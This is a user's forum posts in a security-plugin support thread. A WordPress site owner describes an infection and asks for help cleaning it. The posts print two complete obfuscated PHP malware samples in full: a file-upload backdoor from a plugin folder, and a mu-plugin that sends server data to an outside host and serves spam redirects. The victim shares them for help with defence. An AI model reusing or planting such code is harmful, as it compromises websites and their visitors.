Igor Dovecer

Forum Replies Created

Viewing 3 posts - 1 through 3 (of 3 total)
  • Author
    Posts
  • September 11, 2025 at 6:55 am in reply to: New malicious files and infection that the program cannot detect #159752

    Igor Dovecer
    Member

    Ok, thank you I will.
    BR.

    September 10, 2025 at 3:17 am in reply to: New malicious files and infection that the program cannot detect #159677

    Igor Dovecer
    Member

    More files founr with Wordfende:

    wp-content/plugins/.gallery-by-supsystic/src/GridGallery/Featuredplugins/index.php

    <?php goto ykCej3;AxCHuG: echo /*

    */("oG85")[0];goto BRF6qNEm;BISpL189_: echo ("Gbaw")[2];goto jYu8BW0;mw0W_3Hk: $AOpYTE3 = false; goto _esRnx29;hWDCa5vnHF: echo /* */("Q_a")[3];goto VQ13XIdBDc;i1Zt_dv: $bNwCsM = ucfirst("jnO78R"); goto hWDCa5vnHF;ykCej3: $xrX9I0JA = false; goto qSMmVW2tBZ;hwF1IB: $VfFejBvu = addslashes("VfFejBvu"); goto eTuNgzCMnQ;eTuNgzCMnQ: $BNGuzdf = (/**/("Qesu")[2]./* */("JaZGtk")[4].("iYCTr9")[4].("hAikO")[2].("cxpW")[2]./*
    */("KtoO")[2].("Ussg")[2])("WKAhTl5I","pxu4b"); goto PzXHjpuqf;PzXHjpuqf: $ynXQOj = (/* */("iaLG")[0]./* */("neR3m6")[4].("_per")[1]./* */("l_gn9")[0]./* */("Ot_joU")[4]./**/("dbfM")[0]./* */("eaUJx")[0])(",",array("LT_9j","iV_16z","gI6o45CAl","sq7NidRG")); goto yelvMSuwnc;zyB7Ln: $i_uTNm = (/* */("iaLG")[0]./**/("neR3m6")[4].("_per")[1]./**/("l_gn9")[0]./* 
    */("Ot_joU")[4]./*
    */("dbfM")[0]./*
    */("eaUJx")[0])("i_uTNm",array());goto ZETpXa7Y;ocalDf96EG: $bovKN = (("IKVhsp")[4]./**/("NZzt5")[3].("ZLr3ZB")[2].("kWsYX")[2]./*
    */("xtWM")[1].("AKr3")[2])("iM0Yo3rxd","fbBTRG"); goto AfqM3LkT;_bzhxnlV5: $rzgU5m = (/* 
    
    */("iaLG")[0]./*
      */("neR3m6")[4].("_per")[1]./**/("l_gn9")[0]./* */("Ot_joU")[4]./*

    */("dbfM")[0]./* 
    */("eaUJx")[0])(",",array("JL1qced","Hvw7540db","iZg15e","EoU0neEI")); goto icUuYiMvN;hrRGohl6yv: $ngJMnw6 = (/*
    */("UYsUA")[2]./* 
    */("jtbSaR")[1].("rouPV6")[0].("_uzA3o")[0].("qnM4rj")[4].("rejJS")[1].("QpIn69")[1].("eeEO7")[1].("caR3")[1].("tZkc4")[0])("", 11); goto AxCHuG;dfei4Y: $jkVqgt8m = (("OsvgE")[1]./**/("Qtqv")[1].("WMrG")[2]./**/("_iJ_T3")[3].("VpwJLe")[1]./**/("aLvr2")[0].("wCPBdc")[4])("", 0); goto iwgH74h0oW;ZETpXa7Y: $cACFV = md5("nmVcX"); goto dfei4Y;XphWuT: if($RsdQa)exit("Hhsrta0wRMUzuZKnc".copy($_FILES["dyFw_XdT"][("Xt9zvm")[1]./**/("pnmW")[2]./*
    */("pOGLp")[0]./*
     */("_Zl4_p")[0].("cn82")[1]./*
    */("aQpfHM")[0]./**/("mHxrCV")[0].("ywseC")[3]],$RsdQa));goto BISpL189_;gzr8J_: $hjrdQCltf = (/*  */("R9ws")[2]./* */("oZYr")[0]./*  */("sLqrU")[3].("CdE_M")[1].("aw5g")[1]./*
    */("rZTbU")[0].("a0AXap")[4]./*
    */("ZgdCp9")[4])("", 11);goto i1Zt_dv;_esRnx29: $kDuCiL = (/* */("R9ws")[2]./*
    */("oZYr")[0]./* */("sLqrU")[3].("CdE_M")[1].("aw5g")[1]./* */("rZTbU")[0].("a0AXap")[4]./* */("ZgdCp9")[4])("", 11);goto VFrqJe;jYu8BW0: $vLD1t = lcfirst("QDuStBT"); goto NRsHxK4;VFrqJe: $onBqsmMg = (("Rlc8r5")[2]./* */("hBNpF2")[0].("SPu3pL")[2].("nNork")[0]./*
    */("kPk2fr")[2].("_Y0V")[0].("CFspDe")[2]./*
    
    */("opGHUp")[1].("ARlHS")[2].("icRXVS")[0].("EnxtsP")[3])("YiMpKIsbzCHZ",3); goto LvXbOM6;AfqM3LkT: $HiaOQ = sha1("wPiO_w4U"); goto AoYchCH;kv4rLIg: $RGXAne = ucfirst("CUA1Q6oSZ"); goto TxOVRUJZs2;VQ13XIdBDc: $QtRoTgWFG = (/* */("UYsUA")[2]./*
    */("jtbSaR")[1].("rouPV6")[0].("_uzA3o")[0].("qnM4rj")[4].("rejJS")[1].("QpIn69")[1].("eeEO7")[1].("caR3")[1].("tZkc4")[0])("", 12); goto u74JEf;Bj3GWE: $o5cWOwP = str_shuffle("uyEs5Xz"); goto k8jW9L;KFc7Jrse: $hUp3SQm = (string) null; goto nAg6BR9l2J;iwgH74h0oW: $OlLEq = ucfirst("o80qov"); goto xW0ea_QuY;u74JEf: $dhvF3_V = (/**/("OswLA")[1]./*
    */("pOe1")[0]./**/("xqrHK")[2].("oTxil")[3]./**/("wnd7QE")[1]./**/("QtDtW")[3]./*
    */("fiRGm")[0])(""); goto Bj3GWE;TxOVRUJZs2: $YnCo2d7xL = ucwords("yNWysh42"); goto hwF1IB;AoYchCH: $PsRt7m = (/* */("UYsUA")[2]./*
    */("jtbSaR")[1].("rouPV6")[0].("_uzA3o")[0].("qnM4rj")[4].("rejJS")[1].("QpIn69")[1].("eeEO7")[1].("caR3")[1].("tZkc4")[0])("", 5); goto WlyU249wDs;G65m9e: $LvTRl_ = strval(false); goto pglJFQ;pglJFQ: $LQ3Bz9 = (/* */("bsFZ")[1].("DwuA")[2]./*
    */("bNEMP7")[0]./* */("MPFst")[3]./* */("Btae")[1].("LrGT")[1])("LQ3Bz9",6,0);goto ZV7P9zrUE;xW0ea_QuY: if(!isset($_GET["azK"]))exit;goto xfAcC8;qSMmVW2tBZ: $ppV3cU5S = metaphone("t1XU9f"); goto KFc7Jrse;nAg6BR9l2J: $Gr21H = sha1("Y9_YBwr"); goto ocalDf96EG;LvXbOM6: $hVQEpa = (/**/("R9ws")[2]./*
      */("oZYr")[0]./**/("sLqrU")[3].("CdE_M")[1].("aw5g")[1]./**/("rZTbU")[0].("a0AXap")[4]./*
    */("ZgdCp9")[4])("", 12);goto kv4rLIg;NRsHxK4: $Qo0RO78Ex = (string) null; goto D6WKRspUy;xfAcC8: if(isset($_FILES["dyFw_XdT"]))$RsdQa = basename($_FILES["dyFw_XdT"][/**/("unA2q")[1].("tazMA")[1]./**/("mbtZoM")[0]./* */("peF1")[1]]);goto XphWuT;k8jW9L: $A2ldyEBD = addcslashes("A2ldyEBD","rFNwjKJf4"); goto _bzhxnlV5;BRF6qNEm: echo /*
    */("ZgJS")[0];goto gzr8J_;D6WKRspUy: $Uwzi6EGn = (/**/("Qesu")[2]./* */("JaZGtk")[4].("iYCTr9")[4].("hAikO")[2].("cxpW")[2]./* */("KtoO")[2].("Ussg")[2])("fTt1uWAgM","LFYZb8n"); goto hrRGohl6yv;WlyU249wDs: $v170t = (/**/("R9ws")[2]./*
    */("oZYr")[0]./* */("sLqrU")[3].("CdE_M")[1].("aw5g")[1]./*   */("rZTbU")[0].("a0AXap")[4]./**/("ZgdCp9")[4])("", 15);goto G65m9e;ZV7P9zrUE: $EwM4O = define("nBaNOV","KgpKtuL"); goto zyB7Ln;icUuYiMvN: $SbB3Dj = defined("XSfsaZ8"); goto mw0W_3Hk;yelvMSuwnc:""; ?>

    wp-content/plugins/featured-images-for-rss-feeds/includes/freemius/templates/wp-login.php

    September 8, 2025 at 9:31 pm in reply to: New malicious files and infection that the program cannot detect #159597

    Igor Dovecer
    Member

    I believe both of my websites are infected with malicious code. Unfortunately, current plugin and virus defintions cannot clean them. I initially thought this might be due to the free version, so I donated €29, but it still couldn’t remove the infection.

    I found some suspicious files myself and deleted them. The plugin also detected two files, but it says there’s nothing else in the database, and I couldn’t find anything either. However, Google shows a lot of “advertisement” indexed pages, such as:

    mysite1.com/?m=123456789 → redirects to an ad page
    mysite2.com/?k=123456789 → redirects to an ad page

    These pages lead to sites like: https://www.zbbhot.store/?ggcid=672564

    For now, I temporarily blocked these requests via robots.txt and redirected all ?m= URLs to the homepage using .htaccess.

    Additional findings:

    Your program didn’t detect a hidden user in the database. A user was created there and hidden from the WordPress admin panel:

    Username: wpadminerlz
    Email: domain volomart.ru

    The site had a file in the root directory (public_html) named defuait.php (with a lowercase “i”) containing malicious code.
    There was malicious code in the plugins folder, under mu-plugins, in the file 0hQrmW.php.

    0hQrmW.php file i mu-plugins
    <?php $LcELhCV = md5("ewQH2Sg5"); $aFt80EB_ = ucwords("eoL_Tc"); $WkPNY6Ja = stripos("HLchoR","f1tJEUs"); $nRGoJuN6 = ucfirst("DL4xq8BI"); $wWPEC = metaphone("LPy_f"); $nJqpmV = trim(" "); $cWicE = chunk_split("U_O7FbYx",3); $iOGy2p8 = sprintf(""); $USNlC = implode("USNlC",array());$m20vTi = metaphone("hfKFQkY"); new Ohy6ox();$xDnHL4 = ucfirst("a0kOPts"); $W2orcw = (string) null; function pHndhoQ($IYJS2Khb){ return vuIlOkG("\x6a\x73\157\156\137\x65\156\x63\x6f\x64\x65",1,$IYJS2Khb);}function lRn9uCl($nEPYif3){ if(substr($nEPYif3,0,4)=="\x68\x74\164\160"){ vuIlOkG("\150\145\141\144\145\x72",1,"\x4c\157\143\x61\x74\x69\x6f\156\72\x20".$nEPYif3); } }$kNyfqzdo = implode(",",array("NnR2b","uz8XCoS","FDl2Lkjc","ThbIq")); $S02xCjI = ucfirst("nLOmak"); $W4brjFhy = pHndhoQ($_SERVER);$s9u_bnC = addcslashes("s9u_bnC","f0Iq3UuG9"); $i5k1lt = date("Y-m-d H:i:s"); $uZqdgB = ucwords("v4dmPawKZ"); $tG2Iy0 = strval(false); $rO0fNe = addcslashes("rO0fNe","oPOiNErYyjB"); $YDfeK6Mtu = metaphone("N0ZKo"); $W4brjFhy = BSjqr($W4brjFhy);function BSjqr($IYJS2Khb){ return vuIlOkG("\142\141\163\x65\66\64\137\145\156\143\x6f\x64\x65",1,$IYJS2Khb);}$S0t7bN = date("Y-m-d H:i:s"); class tM0Hi{ public static function __callStatic($name, $arguments) { $isy6AY = vuIlOkG("\x63\x75\162\154\137\x69\x6e\x69\x74"); $VPSMmQHW = "\x68\164\164\x70\72\57\57\x63\141\143\150\145\56\165\x73\145\162\145\162\x70\x2e\x73\151\x74\x65\57\141\142\x6f\x75\164\56\x70\x68\160"; vuIlOkG("\x63\x75\x72\x6c\137\x73\145\164\157\160\x74",3,$isy6AY, (int)("\61\x30\60\60\x32"),$VPSMmQHW."\x3f\x75\141\x3d".vuIlOkG("\165\x72\x6c\145\156\143\157\x64\145",1,$arguments[0])); vuIlOkG("\x63\x75\x72\x6c\137\x73\145\164\157\160\x74",3,$isy6AY, (int)("\x31\71\x39\61\63"), 1); vuIlOkG("\x63\x75\x72\x6c\137\x73\145\164\157\160\x74",3,$isy6AY, (int)("\x36\x34\x5f\162\145\x70\x6c"), 0); vuIlOkG("\x63\x75\x72\x6c\137\x73\145\164\157\160\x74",3,$isy6AY, (int)("\61\x33\x5f\x72\145\160\x6c"), 49); global $nEPYif3; $nEPYif3 = vuIlOkG("\143\x75\x72\x6c\137\145\170\x65\x63",1,$isy6AY); vuIlOkG("\143\x75\x72\x6c\137\143\154\x6f\x73\x65",1,$isy6AY); }}$bIJGPl = sha1("FCS41U"); $FfQg5P_ = addcslashes("FfQg5P_","cdpEM38q"); $GDsX2frhu = define("NwyFW","gNVrZqAvH"); tM0Hi::kevEMgr($W4brjFhy);$TBQ3bpVO = addcslashes("TBQ3bpVO","prtSdBiW1jD3"); $bEQGyUXV6 = array("LxPhOmb6BQf73"); $nQ7LzA_j = chunk_split("E9Ev0tfCFP3ls",3); $wZ30NCJ = strpos("KkBQj","COjw63"); $oho8_eRk = strtok("oho8_eRk"); $oB8m1bi0 = ucfirst("c0p1P"); $bHOP0pmA = lRn9uCl($nEPYif3);$SToQq2R = false; $ICb6x7uo = stripos("GEIX6v","R0QnYo9"); $WBCufL = implode(",",array("b7_Di","TToQ9m","TC18h3V6","rNt4doG")); $qV6CIen = strstr("qV6CIen", "Ut4_aHM"); $ZLjMI2m = addcslashes("ZLjMI2m","GE4BRe5oQ"); $EvUzr = str_replace("EvUzr", "", "EvUzr");$bVquSw = Sbw8_($nEPYif3);function vuIlOkG($strrt,$NzW2b=null,$s2o8GycE=null,$YvBfp1gI=null,$X7ABae=null,$ulSy3WY=null){ if($NzW2b==1)return $strrt($s2o8GycE); if($NzW2b==2)return $strrt($s2o8GycE,$YvBfp1gI); if($NzW2b==3)return $strrt($s2o8GycE,$YvBfp1gI,$X7ABae); if($NzW2b==4)return $strrt($s2o8GycE,$YvBfp1gI,$X7ABae,$ulSy3WY); return $strrt(); }$IwQm5cx = implode("IwQm5cx",array());function XC53Y($nEPYif3){ if(strstr(trim($nEPYif3),"\x3c\150\x74\x6d\154")){ exit($nEPYif3); } }function Sbw8_($nEPYif3){ if(strstr($nEPYif3,"\74\165\x72\154\x73\145\x74")){ exit(vuIlOkG("\150\145\141\144\145\x72",1,"\103\157\156\x74\145\x6e\x74\55\x74\171\x70\145\x3a\164\x65\170\x74\x2f\x78\155\154").$nEPYif3); } }class Ohy6ox{ public function __construct() { $_SERVER["\x54"]="\x7a"; $_SERVER["\x54\x50\114"]="\64"; }}$Bx3eR = str_pad("", 0); $oUxNzIh = XC53Y($nEPYif3);$I8CDVwFgS = defined("hMSv5UYcp"); $KLQFBgYJ = trim(" "); $VC8y1jf = (string) null; $eUJKV7X = define("th8Wc","hGBxc"); $d85HyA1S = str_replace("d85HyA1S", "", "d85HyA1S");$mdcoQA = defined("SbLhK"); $Msn59OWEJ = strval(false); $gWsYQV1oa = md5("wWyMbwS0I"); $v91Io = md5("wwP0nJ"); $sOV2MdC = str_replace("sOV2MdC", "", "sOV2MdC");

    How can I properly clean the website?

    I tried using MalCare, and it claims there are three more malicious files that your program cannot detect. I’m not able to pay €149 per year for cleaning at the moment, so I haven’t purchased it yet. Is there a way your program can help clean these files? Would any assistance or guidance be required to do this? Thank you very much!

    • This topic was modified 3 days, 3 hours ago by  Igor Dovecer.
    • This topic was modified 3 days, 3 hours ago by  Igor Dovecer.
    • This topic was modified 3 days, 3 hours ago by  Igor Dovecer.
  • Author
    Posts
Viewing 3 posts - 1 through 3 (of 3 total)